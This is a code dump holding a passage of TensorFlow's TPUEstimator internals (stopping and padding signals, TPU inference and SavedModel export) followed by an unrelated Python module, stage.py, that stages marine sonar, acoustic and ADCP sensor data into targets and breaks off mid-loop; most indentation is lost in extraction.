inputs=replica_id_inputs,
num_shards=ctx.num_replicas,
outputs_from_all_shards=False,
device_assignment=ctx.device_assignment)
loss = loss[0]
return (compile_op, loss, host_call, captured_scaffold_fn,
captured_training_hooks.get())
def _predict_on_tpu_system(ctx, model_fn_wrapper, dequeue_fn):
"""Executes `model_fn_wrapper` multiple times on all TPU shards."""
(single_tpu_predict_step, host_calls, captured_scaffold_fn,
captured_predict_hooks
) = model_fn_wrapper.convert_to_single_tpu_predict_step(dequeue_fn)
@tpu_function.on_device_training_loop
def multi_tpu_predict_steps_on_single_shard(replica_id):
# `tpu.split_compile_and_shard()` splits and passes input for each
# replica as an array. As such, reshape the input back to a scalar.
replica_id = array_ops.reshape(replica_id, [])
with tpu_context._TPUEstimatorReplicaContext(replica_id): # pylint: disable=protected-access
def cond(scalar_stopping_signal):
return math_ops.logical_not(
_StopSignals.should_stop(scalar_stopping_signal))
inputs = [_StopSignals.NON_STOPPING_SIGNAL]
outputs = training_loop.while_loop(
cond, single_tpu_predict_step, inputs=inputs, name=b'loop')
return outputs
# Add input that represents id for each replica in sync so that
# _TPUEstimatorReplicaContext can be correctly entered during
# replicated computation.
replica_id_inputs = []
replica_id_inputs.append(
[constant_op.constant(i) for i in range(ctx.num_replicas)])
(
compile_op,
dummy_predict_op,
) = tpu.split_compile_and_shard(
multi_tpu_predict_steps_on_single_shard,
inputs=replica_id_inputs,
num_shards=ctx.num_replicas,
outputs_from_all_shards=False,
device_assignment=ctx.device_assignment)
dummy_predict_op = dummy_predict_op[0]
return (compile_op, dummy_predict_op, host_calls, captured_scaffold_fn,
captured_predict_hooks.get())
def _wrap_computation_in_while_loop(device, op_fn):
"""Wraps the ops generated by `op_fn` in tf.while_loop."""
def computation(i):
with ops.control_dependencies(op_fn()):
return i + 1
iterations_per_loop_var = _create_or_get_iterations_per_loop()
# By setting parallel_iterations=1, the parallel execution in while_loop is
# basically turned off.
with ops.device(device):
iterations = array_ops.identity(iterations_per_loop_var)
return control_flow_ops.while_loop(
lambda i: i < iterations,
computation, [constant_op.constant(0)],
parallel_iterations=1)
def _wrap_computation_in_while_loop_with_stopping_signals(device, op_fn):
"""Wraps the ops generated by `op_fn` in tf.while_loop."""
def cond(scalar_stopping_signal):
return math_ops.logical_not(
_StopSignals.should_stop(scalar_stopping_signal))
def computation(unused_scalar_stopping_signal):
return_value = op_fn()
execute_ops = return_value['ops']
signals = return_value['signals']
with ops.control_dependencies(execute_ops):
return _StopSignals.as_scalar_stopping_signal(signals)
# By setting parallel_iterations=1, the parallel execution in while_loop is
# basically turned off.
with ops.device(device):
return control_flow_ops.while_loop(
cond,
computation, [_StopSignals.NON_STOPPING_SIGNAL],
parallel_iterations=1)
def _validate_tpu_training_graph():
"""Validate graph before running distributed training.
Raises:
ValueError: If the graph seems invalid for running on device
"""
if control_flow_util.ENABLE_CONTROL_FLOW_V2:
return # b/124241278
operations = ops.get_default_graph().get_operations()
# Check if there is at least one CrossReplicaSum operation in the graph.
# This should be introduced by using the CrossShardOptimizer wrapper
cross_replica_sum_ops = [
o for o in operations if o.type == _CROSS_REPLICA_SUM_OP
]
if not cross_replica_sum_ops:
raise ValueError(
'CrossShardOptimizer must be used for model training on TPUs.')
class _CapturedObject(object):
"""A placeholder to capture an object.
This is useful when we need to capture a Python object in the Tensorflow
control flow body function and use it outside the control flow.
"""
def __init__(self):
self._object = None
self._captured = False
def capture(self, o):
if self._captured:
raise RuntimeError(
'InternalError: Object can capture only once. Please file bug.')
self._captured = True
self._object = o
def get(self):
if not self._captured:
raise RuntimeError(
'InternalError: Object is not captured properly before `get`. '
'Please file bug.')
return self._object
def _get_scaffold(captured_scaffold_fn):
"""Retrieves the Scaffold from `captured_scaffold_fn`."""
with _CapturingContext(message='Inside scaffold_fn'):
scaffold_fn = captured_scaffold_fn.get()
if scaffold_fn:
scaffold = scaffold_fn()
if scaffold is None:
raise ValueError(
'TPUEstimatorSpec.scaffold_fn returns None, which is not allowed')
else:
scaffold = None
if scaffold:
wrapped_finalize = scaffold.finalize
def _finalize():
with _CapturingContext('Inside Scaffold.finalize'):
wrapped_finalize()
scaffold.finalize = _finalize
return scaffold
class _CapturingContext(control_flow_ops.ControlFlowContext):
"""Tracks references to Tensors defined in TPU replication."""
def __init__(self, message):
control_flow_ops.ControlFlowContext.__init__(self)
self._message = message
def to_control_flow_context_def(self, context_def, export_scope=None):
# pylint: disable=useless-super-delegation
# NOTE(slebedev): the method is required by `ControlFlowContext`.
super(_CapturingContext, self).to_control_flow_context_def(
context_def, export_scope)
def AddOp(self, op): # pylint: disable=invalid-name
for c in op.inputs:
if tpu._TPU_REPLICATE_ATTR in c.op.node_def.attr: # pylint: disable=protected-access
raise ValueError('{}: Op {} depends on TPU computation {}, '
'which is not allowed.'.format(self._message, op, c))
def __enter__(self):
# pylint: disable=protected-access
self._g = ops.get_default_graph()
self._old = self._g._get_control_flow_context()
self._g._set_control_flow_context(self)
# pylint: enable=protected-access
def __exit__(self, _, __, ___): # pylint: disable=invalid-name
self._g._set_control_flow_context(self._old) # pylint: disable=protected-access
class _Inputs(object):
"""A data structure representing the input_fn returned values.
This also supports the returned value from input_fn as `Dataset`.
"""
def __init__(self, features=None, labels=None, dataset=None, signals=None):
if dataset is not None and (features is not None or labels is not None or
signals is not None):
raise RuntimeError('Internal Error: Either (features and labels) or '
'dataset should be provided, not both. Please file '
'bug')
self._features = features
self._labels = labels
self._signals = signals
self._dataset = dataset
self._iterator = None
@staticmethod
def from_input_fn(return_values):
"""Returns an `_Inputs` instance according to `input_fn` return value."""
if isinstance(return_values, dataset_ops.DatasetV2):
dataset = return_values
return _Inputs(dataset=dataset)
features, labels = _Inputs._parse_inputs(return_values)
return _Inputs(features, labels)
@staticmethod
def _parse_inputs(return_values):
if isinstance(return_values, tuple):
features, labels = return_values
else:
features, labels = return_values, None
return features, labels
@property
def is_dataset(self):
"""Returns True if the return value from input_fn is Dataset."""
return self._dataset is not None
def dataset_initializer(self):
"""Returns the dataset's initializer.
The initializer must be run before calling `features_and_labels`.
"""
self._iterator = dataset_ops.make_initializable_iterator(self._dataset)
return self._iterator.initializer
def features_and_labels(self):
"""Gets `features` and `labels`."""
if self.is_dataset:
if self._iterator is None:
raise RuntimeError('Internal error: Must run dataset_initializer '
'before calling features_and_labels(). Please file '
'a bug!')
return _Inputs._parse_inputs(self._iterator.get_next())
return (self._features, self._labels)
def signals(self):
return self._signals
@property
def dataset(self):
return self._dataset
class _InputsWithStoppingSignals(_Inputs):
"""Inputs with `_StopSignals` inserted into the dataset."""
def __init__(self,
dataset,
batch_size,
add_padding=False,
num_invocations_per_step=1):
assert dataset is not None
user_provided_dataset = dataset.map(
_InputsWithStoppingSignals.insert_stopping_signal(
stop=False, batch_size=batch_size, add_padding=add_padding))
if num_invocations_per_step == 1:
final_batch_dataset = dataset.take(1).map(
_InputsWithStoppingSignals.insert_stopping_signal(
stop=True, batch_size=batch_size, add_padding=add_padding))
else:
# We append (2 * num_invocations_per_step - 1) batches for exhausting the
# user_provided_dataset and stop properly.
# For example, if num_invocations_per_step is 2, we append 3 additional
# padding batches: b1, b2, b3.
# If user_provided_dataset contains two batches: a1, a2
# Step 1: [a1, a2]
# Step 2: [b1, b2] -> STOP
# If user_provided_dataset contains three batches: a1, a2, a3.
# The training loops:
# Step 1: [a1, a2]
# Step 2: [a3, b1]
# Step 3: [b2, b3] -> STOP.
final_batch_dataset = dataset.take(1).map(
_InputsWithStoppingSignals.insert_stopping_signal(
stop=True, batch_size=batch_size, add_padding=add_padding))
final_batch_dataset = final_batch_dataset.repeat(
2 * num_invocations_per_step - 1)
def _set_mask(data_dict):
signals = data_dict['signals']
signals['padding_mask'] = array_ops.ones_like(signals['padding_mask'])
data_dict['signals'] = signals
return data_dict
# Mask out the extra batch.
final_batch_dataset = final_batch_dataset.map(_set_mask)
dataset = user_provided_dataset.concatenate(final_batch_dataset).prefetch(2)
super(_InputsWithStoppingSignals, self).__init__(dataset=dataset)
self._current_inputs = None
def features_and_labels(self):
if self._current_inputs is not None:
raise RuntimeError(
'Internal Error: The previous inputs have not been properly '
'consumed. First call features_and_labels, then call signals.')
inputs_with_signals = self._iterator.get_next()
features = inputs_with_signals['features']
labels = inputs_with_signals.get('labels')
self._current_inputs = inputs_with_signals
return features, labels
def signals(self):
"""Returns the `Signals` from `_Inputs`."""
if self._current_inputs is None:
raise RuntimeError(
'Internal Error: The current inputs have not been properly '
'generated. First call features_and_labels, then call signals.')
signals = self._current_inputs['signals']
self._current_inputs = None
return signals
@staticmethod
def insert_stopping_signal(stop, batch_size, add_padding=False):
"""Inserts stopping_signal into dataset via _map_fn.
Here we change the data structure in the dataset, such that the return value
is a dictionary now and `features`, `labels`, and `signals` are three
distinguished keys in that dict. This provides a better structure, which
eases the process to decompose the inputs (see `features_and_labels`).
Args:
stop: bool, state of current stopping signals.
batch_size: int, batch size.
add_padding: bool, whether to pad the tensor to full batch size.
Returns:
A map_fn passed to dataset.map API.
"""
def _map_fn(*args):
"""The map fn to insert signals."""
if len(args) == 1:
# Unpack the single Tensor/dict argument as features. This is required
# when the input_fn returns no labels.
args = args[0]
features, labels = _Inputs._parse_inputs(args)
new_input_dict = {}
if add_padding:
padding_mask, features, labels = (
_PaddingSignals.pad_features_and_labels(features, labels,
batch_size))
new_input_dict['features'] = features
if labels is not None:
new_input_dict['labels'] = labels
else:
new_input_dict['features'] = features
if labels is not None:
new_input_dict['labels'] = labels
padding_mask = None
new_input_dict['signals'] = _StopSignals(
stop=stop, batch_size=batch_size,
padding_mask=padding_mask).as_dict()
return new_input_dict
return _map_fn
class _StopSignals(object):
"""Signals class holding all logic to handle TPU stopping condition."""
NON_STOPPING_SIGNAL = False
STOPPING_SIGNAL = True
def __init__(self, stop, batch_size, padding_mask=None):
self._stop = stop
self._batch_size = batch_size
self._padding_mask = padding_mask
def as_dict(self):
"""Returns the signals as Python dict."""
shape = [self._batch_size, 1]
dtype = dtypes.bool
if self._stop:
stopping = array_ops.ones(shape=shape, dtype=dtype)
else:
stopping = array_ops.zeros(shape=shape, dtype=dtype)
signals = {'stopping': stopping}
if self._padding_mask is not None:
signals['padding_mask'] = self._padding_mask
return signals
@staticmethod
def as_scalar_stopping_signal(signals):
return array_ops.identity(signals['stopping'][0][0])
@staticmethod
def should_stop(scalar_stopping_signal):
"""Detects whether scalar_stopping_signal indicates stopping."""
if isinstance(scalar_stopping_signal, ops.Tensor):
# STOPPING_SIGNAL is a constant True. Here, the logical_and is just the TF
# way to express the bool check whether scalar_stopping_signal is True.
return math_ops.logical_and(scalar_stopping_signal,
_StopSignals.STOPPING_SIGNAL)
else:
# For non Tensor case, it is used in SessionRunHook. So, we cannot modify
# the graph anymore. Here, we use pure Python.
return bool(scalar_stopping_signal)
class _PaddingSignals(object):
"""Signals class holding all logic to handle padding."""
@staticmethod
def pad_features_and_labels(features, labels, batch_size):
"""Pads out the batch dimension of features and labels."""
real_batch_size = array_ops.shape(
_PaddingSignals._find_any_tensor(features))[0]
batch_size_tensor = constant_op.constant(batch_size, dtypes.int32)
check_greater = check_ops.assert_greater_equal(
batch_size_tensor,
real_batch_size,
data=(batch_size_tensor, real_batch_size),
message='The real batch size should not be greater than batch_size.')
with ops.control_dependencies([check_greater]):
missing_count = batch_size_tensor - real_batch_size
def pad_single_tensor(tensor):
"""Pads out the batch dimension of a tensor to the complete batch_size."""
rank = len(tensor.shape)
assert rank > 0
padding = array_ops.stack([[0, missing_count]] + [[0, 0]] * (rank - 1))
padded_shape = (batch_size,) + tuple(tensor.shape[1:])
padded_tensor = array_ops.pad(tensor, padding)
padded_tensor.set_shape(padded_shape)
return padded_tensor
def nest_pad(tensor_or_dict):
return nest.map_structure(pad_single_tensor, tensor_or_dict)
features = nest_pad(features)
if labels is not None:
labels = nest_pad(labels)
padding_mask = _PaddingSignals._padding_mask(real_batch_size, missing_count,
batch_size)
return padding_mask, features, labels
@staticmethod
def slice_tensor_or_dict(tensor_or_dict, signals):
"""Slice the real Tensors according to padding mask in signals."""
padding_mask = signals['padding_mask']
batch_size = array_ops.shape(padding_mask)[0]
def verify_batch_size(tensor):
check_batch_size = math_ops.equal(batch_size, tensor.shape[0])
with ops.control_dependencies([check_batch_size]):
return array_ops.identity(tensor)
def slice_single_tensor(tensor):
rank = len(tensor.shape)
assert rank > 0
real_batch_size = batch_size - math_ops.reduce_sum(padding_mask)
return verify_batch_size(tensor)[0:real_batch_size]
# As we split the Tensors to all TPU cores and concat them back, it is
# important to ensure the real data is placed before padded ones, i.e.,
# order is preserved. Given that, the sliced padding mask should have all
# 0's. If this assertion failed, the slice logic here would not hold.
sliced_padding_mask = slice_single_tensor(padding_mask)
assert_padding_mask = math_ops.equal(
math_ops.reduce_sum(sliced_padding_mask), 0)
with ops.control_dependencies([assert_padding_mask]):
should_stop = _StopSignals.should_stop(
_StopSignals.as_scalar_stopping_signal(signals))
is_full_batch = math_ops.equal(math_ops.reduce_sum(padding_mask), 0)
def slice_fn(tensor):
# If the current batch is full batch or part of stopping signals, we do
# not need to slice to save performance.
return control_flow_ops.cond(
math_ops.logical_or(should_stop, is_full_batch),
(lambda: verify_batch_size(tensor)),
(lambda: slice_single_tensor(tensor)))
return nest.map_structure(slice_fn, tensor_or_dict)
@staticmethod
def _find_any_tensor(batch_features):
tensors = [
x for x in nest.flatten(batch_features) if isinstance(x, ops.Tensor)
]
if not tensors:
raise ValueError('Cannot find any Tensor in features dict.')
return tensors[0]
@staticmethod
def _padding_mask(real_batch_size, missing_count, batch_size):
padding_mask = array_ops.concat([
array_ops.zeros((real_batch_size,), dtype=dtypes.int32),
array_ops.ones((missing_count,), dtype=dtypes.int32)
],
axis=0)
padding_mask.set_shape((batch_size,))
return padding_mask
def _verify_cross_hosts_transfer_size(tensor_dict, message):
total_size = 0
tensor_structure = {}
for key, tensor in tensor_dict.items():
shape = tensor.shape
size = np.product(shape) * tensor.dtype.size
tensor_structure[key] = shape
total_size += size
if total_size >= _ONE_GIGABYTE:
raise ValueError(
'{} The transfer size is larger than the protobuf limit. Please '
'consider to use Tensors with smaller shapes or reduce batch '
'size. Given:\n'
'{}'.format(
message, '\n'.join([
' -- Key: {}, Shape: {}'.format(k, v)
for k, v in tensor_structure.items()
])))
def _add_item_to_params(params, key, value):
"""Adds a new item into `params`."""
if hasattr(params, 'set_hparam'):
# For HParams, we need to use special API.
if key in params:
params.set_hparam(key, value)
else:
params.add_hparam(key, value)
else:
# Now params is Python dict.
params[key] = value
def export_estimator_savedmodel(estimator,
export_dir_base,
serving_input_receiver_fn,
assets_extra=None,
as_text=False,
checkpoint_path=None):
"""Export `Estimator` trained model for TPU inference.
Args:
estimator: `Estimator` with which model has been trained.
export_dir_base: A string containing a directory in which to create
timestamped subdirectories containing exported SavedModels.
serving_input_receiver_fn: A function that takes no argument and returns a
`ServingInputReceiver` or `TensorServingInputReceiver`.
assets_extra: A dict specifying how to populate the assets.extra directory
within the exported SavedModel, or `None` if no extra assets are needed.
as_text: whether to write the SavedModel proto in text format.
checkpoint_path: The checkpoint path to export. If `None` (the default),
the most recent checkpoint found within the model directory is chosen.
Returns:
The string path to the exported directory.
"""
# `TPUEstimator` requires `tpu_config.RunConfig`, so we cannot use
# `estimator.config`.
config = tpu_config.RunConfig(model_dir=estimator.model_dir)
est = TPUEstimator(
estimator._model_fn, # pylint: disable=protected-access
config=config,
params=estimator.params,
use_tpu=True,
train_batch_size=2048, # Does not matter.
eval_batch_size=2048, # Does not matter.
)
return est.export_saved_model(export_dir_base, serving_input_receiver_fn,
assets_extra, as_text, checkpoint_path)
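# Illustrative usage sketch (not part of the original source). `my_estimator` and
# `my_serving_input_fn` are placeholders for a trained `Estimator` and a function
# returning a `ServingInputReceiver`; both must be supplied by the caller, and the
# export directory below is an example path only.
def _example_export_for_tpu_inference(my_estimator, my_serving_input_fn):
  export_dir = export_estimator_savedmodel(
      estimator=my_estimator,
      export_dir_base='/tmp/tpu_saved_model',  # a timestamped subdirectory is created here
      serving_input_receiver_fn=my_serving_input_fn)
  return export_dir  # string path to the exported SavedModel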
def model_fn_inference_on_tpu(model_fn,
features,
labels=None,
config=None,
params=None,
batch_config=None):
"""Convenience wrapper for export_saved_model API v2 for a model_fn.
It attempts to execute the entire model function on the TPU for prediction.
Note that this does not support features which are SparseTensors. If you have
SparseTensor features, consider partitioning your model function further and
use inference_on_tpu.
Args:
model_fn: the model_fn for which we want to inference on TPU.
features: a tensor or dict of tensors, serves as the feature inputs to the
model.
labels: a tensor or dict of tensors, serves as the labels inputs to the
model.
config: auxiliary config to the Estimator.
params: hparams that we want to pass to the model_fn.
batch_config: a named tuple to wrap the inference batching configuration
inputs.
Returns:
An EstimatorSpec containing the outputs in export_outputs and predictions.
"""
computation, capture = _build_computation_for_inference(
model_fn, labels, config, params)
tensors = call_computation(
features,
computation,
batch_config=batch_config)
estimator_spec, export_outputs_dict, predictions_dict, none_indices = (
capture.get())
predictions_list = tensors[:len(predictions_dict)]
export_outputs_list_without_none = tensors[len(predictions_dict):]
# Reinsert `None`s which we've taken out in
# `_build_computation_for_inference()`.
export_outputs_list = []
while none_indices or export_outputs_list_without_none:
if none_indices and none_indices[0] == len(export_outputs_list):
export_outputs_list.append(None)
none_indices.pop(0)
else:
export_outputs_list.append(export_outputs_list_without_none.pop(0))
# Reconstruct `export_outputs` with updated tensors.
new_export_outputs_dict = nest.pack_sequence_as(export_outputs_dict,
export_outputs_list)
export_outputs = estimator_spec.export_outputs
new_export_outputs = collections.OrderedDict(
(k, _clone_export_output_with_tensors(export_outputs[k], v))
for k, v in six.iteritems(new_export_outputs_dict))
# Reconstruct `predictions` with updated tensors.
new_predictions = nest.pack_sequence_as(predictions_dict, predictions_list)
if (len(new_predictions) == 1 and
_KEY_WHEN_PREDICTIONS_IS_A_TENSOR in new_predictions):
new_predictions = new_predictions[_KEY_WHEN_PREDICTIONS_IS_A_TENSOR]
return estimator_spec._replace(
export_outputs=new_export_outputs, predictions=new_predictions)
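# Illustrative sketch (not part of the original source): wrapping a user-supplied
# `my_model_fn` so the whole prediction graph runs on the TPU during serving.
# Remember that features must not contain SparseTensors (see the docstring above).
def _example_make_tpu_serving_model_fn(my_model_fn):
  """Returns a serving model_fn that runs `my_model_fn` entirely on TPU."""
  def serving_model_fn(features, labels, mode, config, params):
    del mode  # inference only; model_fn_inference_on_tpu always uses PREDICT
    return model_fn_inference_on_tpu(
        my_model_fn, features, labels=labels, config=config, params=params)
  return serving_model_fn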
def _build_computation_for_inference(model_fn,
labels,
config,
params):
"""Builds the computation with calls the model_fn for inference."""
capture = _CapturedObject()
def computation(computation_input):
"""Computation to be passed to `TPUPartitionedCall()`."""
tpu_computation, tpu_capture = _build_tpu_computation_for_inference(
model_fn, computation_input, labels, config, params)
tensors_on_cpu = tpu.rewrite(tpu_computation)
tpu.prune_unconnected_ops_from_xla(ops.get_default_graph())
(estimator_spec, export_outputs_dict, export_outputs_list,
predictions_dict) = (
tpu_capture.get())
predictions_list = tensors_on_cpu[:len(predictions_dict)]
export_outputs_tpu_on_cpu_list = tensors_on_cpu[len(predictions_dict):]
# Reconstruct tensors used in export_outputs, with TPU tensors replaced
# with their CPU counterpart returned from `rewrite_for_inference()`.
# `function.Defun()` does not like `None`s in return values, so we leave
# `None`s out but record their positions for later reconstruction.
export_outputs_list_without_none = []
none_indices = []
for i, t in enumerate(export_outputs_list):
if t is None:
none_indices.append(i)
else:
export_outputs_list_without_none.append(
export_outputs_tpu_on_cpu_list.pop(0))
capture.capture(
(estimator_spec, export_outputs_dict, predictions_dict, none_indices))
return predictions_list + export_outputs_list_without_none
return computation, capture
def _build_tpu_computation_for_inference(model_fn, features, labels, config,
params):
"""Builds the TPU computation for inference on TPU."""
capture = _CapturedObject()
def computation():
"""Compute tpu tensors used in export_outputs.
Passed to rewrite_for_inference so that model_fn will be called under
the rewriting contexts. Only tpu tensors are returned, but export_outputs
and scaffold are captured.
Returns:
A list of Tensors used in export_outputs and not marked for
outside_compilation.
"""
# We should only call model fn once and it should be inside `computation`
# so that building the graph will happen under `rewrite_for_inference`.
model_fn_args = function_utils.fn_args(model_fn)
kwargs = {}
# Makes deep copy with `config` and `params` in case user mutates them.
if 'labels' in model_fn_args:
kwargs['labels'] = labels
if 'mode' in model_fn_args:
kwargs['mode'] = model_fn_lib.ModeKeys.PREDICT
if 'config' in model_fn_args:
kwargs['config'] = config
if 'params' in model_fn_args:
kwargs['params'] = params
estimator_spec = model_fn(features, **kwargs)
# We pick the TPU tensors out from `export_output` and later return them
# from `computation` for rewriting.
export_outputs_dict = collections.OrderedDict(
(k, _export_output_to_tensors(v))
for k, v in six.iteritems(estimator_spec.export_outputs))
export_outputs_list = nest.flatten(export_outputs_dict)
export_outputs_tpu_list = [t for t in export_outputs_list if t is not None]
if isinstance(estimator_spec.predictions, dict):
predictions_dict = collections.OrderedDict(
(k, v) for k, v in six.iteritems(estimator_spec.predictions))
else:
predictions_dict = {
_KEY_WHEN_PREDICTIONS_IS_A_TENSOR: estimator_spec.predictions
}
predictions_list = nest.flatten(predictions_dict)
# We cannot return everything we want through the return values, so
# capture the rest here for later use.
capture.capture((estimator_spec, export_outputs_dict, export_outputs_list,
predictions_dict))
return predictions_list + export_outputs_tpu_list
return computation, capture
def inference_on_tpu(computation,
inputs_to_tpu,
num_batch_threads,
max_batch_size,
batch_timeout_micros,
allowed_batch_sizes=None,
max_enqueued_batches=10):
"""Convenient wrapper for export_saved_model API v2 to wrap TPU computation.
It puts computation on TPU, add batching around it and round robin computation
between TPU cores.
See tpu_estimator_test.py for an example.
Args:
computation: computation to be put on TPU, which takes inputs_to_tpu as
arguments.
inputs_to_tpu: a list of tensors as input to computation.
num_batch_threads: Number of scheduling threads for processing batches of
work. Determines the number of batches processed in parallel.
max_batch_size: Batch sizes will never be bigger than this.
batch_timeout_micros: Maximum number of microseconds to wait before
outputting an incomplete batch.
allowed_batch_sizes: Optional list of allowed batch sizes. If left empty,
does nothing. Otherwise, supplies a list of batch sizes, causing the op to
pad batches up to one of those sizes. The entries must increase
monotonically, and the final entry must equal max_batch_size.
max_enqueued_batches: The maximum depth of the batch queue. Defaults to 10.
Returns:
The unbatched computation output Tensors.
"""
@batch_ops.batch_function(num_batch_threads, max_batch_size,
batch_timeout_micros, allowed_batch_sizes,
max_enqueued_batches)
def batched_tpu_computation(*args):
@function.Defun(capture_resource_var_by_value=False)
def tpu_computation():
return tpu.rewrite(computation, args)
return tpu_functional.TPUPartitionedCall(
args=tpu_computation.captured_inputs,
device_ordinal=tpu_ops.tpu_ordinal_selector(),
Tout=[o.type for o in tpu_computation.definition.signature.output_arg],
f=tpu_computation)
return batched_tpu_computation(*inputs_to_tpu)
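# Illustrative usage sketch (not part of the original source). `my_computation`
# and `my_inputs` are placeholders, and the batching parameters are example values
# that should be tuned for the actual serving workload.
def _example_inference_on_tpu(my_computation, my_inputs):
  return inference_on_tpu(
      computation=my_computation,
      inputs_to_tpu=my_inputs,            # list of input tensors
      num_batch_threads=8,                # batches processed in parallel
      max_batch_size=128,
      batch_timeout_micros=5000,          # flush incomplete batches after 5 ms
      allowed_batch_sizes=[16, 32, 64, 128])  # final entry must equal max_batch_size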
|
stage.py
|
import random
import threading
import numpy as np
import datetime
from rules import SendTriggers
from targets import Target
import config
import time
class Stage:
""""""
def __init__(self, processor, target_space, send_triggers, source=config.site_name):
self.processor = processor
self.target_space = target_space
self.send_triggers = send_triggers
self.data_queues = {}
for stream in config.data_streams:
self.data_queues[stream] = []
# NIMS grouped by target_id, so change to dict {target_id: [indices]}
self.data_queues['nims'] = {}
self.recent_targets = []
# Adds ADCP (necessary for testing when not connected to ADCP)
unixtime = (datetime.datetime.utcnow() - datetime.datetime(1970,1,1))
self.addDataToStage('adcp', [unixtime.days*24*60*60 + unixtime.seconds, 1.2, 4.5])
self.startStageProcessing()
def processDataBeforeStage(self, stream, data):
"""Performs whatever preprocessing necessitated for data from a
particular stream, adds data to appropriate target list, then returns
index for added data in TargetSpace.
Assumes 'nims' passes a list inside a dict with different tracks.
"""
if stream == 'adcp':
data = [datetime.datetime.fromtimestamp(data[0]), data[1], data[2]]
indices = self.target_space.append_entry(stream, data)
elif stream == 'pamguard':
# comm format matches desired, no need to change
indices = self.target_space.append_entry(stream, data)
elif stream == 'nims':
indices = {}
timestamp = data[0]
for track in data[1]:
new_data = [timestamp, track['id'], track['pings_visible'],
track['first_ping'], track['target_strength'], track['width'],
track['height'], track['size_sq_m'], track['speed_mps'],
track['min_angle_m'], track['min_range_m'], track['max_angle_m'],
track['max_range_m'], track['last_pos_bearing'],
track['last_pos_range'], None]
indices[track['id']] = self.target_space.append_entry(stream, new_data)
elif stream in config.data_streams:
raise ValueError("No stage processing functionality exists for" \
" data stream {0}.".format(stream))
else:
raise ValueError("Error processing data for stage. Stream {0} not" \
" defined in config file.".format(stream))
return indices
def addDataToStage(self, stream, data):
"""Calls processing function for data based on stream then adds data to
stream-specific queue.
"""
if stream not in config.data_streams:
raise ValueError("Error adding data to stage. Data stream {0} not" \
" defined in config file.".format(stream))
stage_indices = self.processDataBeforeStage(stream, data)
if stream == 'nims': # indexed
for track_id in stage_indices:
if track_id not in self.data_queues[stream]:
self.data_queues[stream][track_id] = []
self.data_queues[stream][track_id].append(stage_indices[track_id])
elif stream == 'pamguard' or stream == 'adcp': # one at any time
self.data_queues[stream] = stage_indices
else:
self.data_queues[stream].append(stage_indices) # can have multiple
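# Illustrative usage sketch (not part of the original source). `stage` is assumed
# to be an already-constructed Stage instance; the ADCP payload mirrors the
# [unix_timestamp, value, value] layout used in __init__ above.
def _example_add_adcp_sample(stage):
    stage.addDataToStage('adcp', [int(time.time()), 1.2, 4.5])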
def createOrUpdateTarget(self, nims=[], pamguard=[], adcp=[]):
"""Appends or creates a Target instance based on current staged data."""
if pamguard != [] and nims == []:
for target in self.recent_targets:
# Data is captured in a nims+pamguard Target that will be saved, ignore
if target.indices.get('pamguard') == pamguard:
break
else:
# Data not captured in any other Targets, create a new one
target_out = Target(target_space=self.target_space,
source=config.site_name + "_auto",
firstseen=self.target_space.get_entry_value_by_index('pamguard', pamguard, 'timestamp'),
lastseen=self.target_space.get_entry_value_by_index('pamguard', pamguard, 'timestamp'),
indices={'pamguard': pamguard, 'adcp': adcp})
target_out.update_classifier_table()
self.recent_targets.append(target_out)
return target_out
elif nims != [] and nims[1] != []:
#print("nims[0]:", nims[0], "nims[1]:", nims[1])
for target in self.recent_targets:
if target.get_entry_value('nims', 'id') == nims[0]:
# There's an existing target with that id, update that Target object
target.update_entry('nims', nims[1])
return target
else:
if pamguard:
first_timestamp = min(self.target_space.get_entry_value_by_index('pamguard', pamguard[-1], 'timestamp'),
self.target_space.get_entry_value_by_index('nims', nims[1][0],'timestamp'))
latest_timestamp = max(self.target_space.get_entry_value_by_index('pamguard', pamguard[-1], 'timestamp'),
self.target_space.get_entry_value_by_index('nims', nims[1][-1],'timestamp'))
else:
first_timestamp = self.target_space.get_entry_value_by_index('nims', nims[1][0],'timestamp')
latest_timestamp = self.target_space.get_entry_value_by_index('nims', nims[1][-1],'timestamp')
pamguard = None
if len(nims[1]) == 1:
# We don't have existing targets and only one index in queue
self.target_space.tables['nims'][nims[1][0]][-1] = [] # changes agg_indices to []
target_out = Target(target_space=self.target_space,
source=config.site_name + "_auto",
firstseen=first_timestamp,
lastseen=latest_timestamp,
indices={'nims': nims[1][0], 'pamguard': pamguard, 'adcp': adcp})
self.recent_targets.append(target_out)
return target_out
elif len(nims[1]) > 1:
# We don't have existing targets, but multiple indices in queue
combined_entry = self.target_space.combine_entries('nims', nims[1])
index = self.target_space.append_entry('nims', combined_entry)
target_out = Target(target_space=self.target_space,
source=config.site_name + "_auto",
firstseen=first_timestamp,
lastseen=latest_timestamp,
indices={'nims': index, 'pamguard': pamguard, 'adcp': adcp})
self.recent_targets.append(target_out)
return target_out
def startStageProcessing(self):
"""Creates thread, starts loop that processes stage data."""
threading.Thread(target=self.processEligibleStagedData).start()
# Should be looping. That way, we can check time-based conditions.
def processEligibleStagedData(self):
"""Deletes, classifies, or sends data to rules if eligible."""
# Only try to create a new target in the potential pamguard-only case
while True:
# determine if ADCP is active
adcp_index = self.data_queues['adcp']
adcp_last_seen = self.target_space.get_entry_value_by_index('adcp', adcp_index, 'timestamp')
adcp_flag = abs(datetime.datetime.now() - adcp_last_seen) > datetime.timedelta(0,60*config.adcp_last_seen_threshold,0)
if adcp_flag:
raise Exception('ADCP is no longer updating, cannot classify features.')
if self.data_queues['pamguard'] != []:
pamguard_exceeds_max_time = (datetime.datetime.utcnow() -
self.target_space.get_entry_value_by_index('pamguard',
self.data_queues['pamguard'],'timestamp') >= datetime.timedelta(
seconds=config.data_streams_classifier_triggers['pamguard_max_time']))
if pamguard_exceeds_max_time:
target = self.createOrUpdateTarget(pamguard=self.data_queues['pamguard'],
adcp=self.data_queues['adcp'])
self.data_queues['pamguard'] = []
self.recent_targets.append(target)
self.send_triggers.check_saving_rules(target, None)
self.send_triggers.send_triggers_if_ready()
track_ids_to_remove = []
track_ids_to_process = list(self.data_queues['nims'].keys())
for track_id in track_ids_to_process:
# If max_pings or max_time, create/update Target
ping_count = len(self.data_queues['nims'][track_id])
exceeds_max_pings = (ping_count >=
config.data_streams_classifier_triggers['nims_max_pings'])
exceeds_max_time = (datetime.datetime.utcnow() -
self.target_space.get_entry_value_by_index('nims',
self.data_queues['nims'][track_id][-1], 'timestamp')
>= datetime.timedelta(seconds=config.data_streams_classifier_triggers['nims_max_time']))
if exceeds_max_pings or exceeds_max_time:
target = self.createOrUpdateTarget(nims=(track_id, self.data_queues['nims'][track_id]),
pamguard=self.data_queues['pamguard'],
adcp=self.data_queues['adcp'])
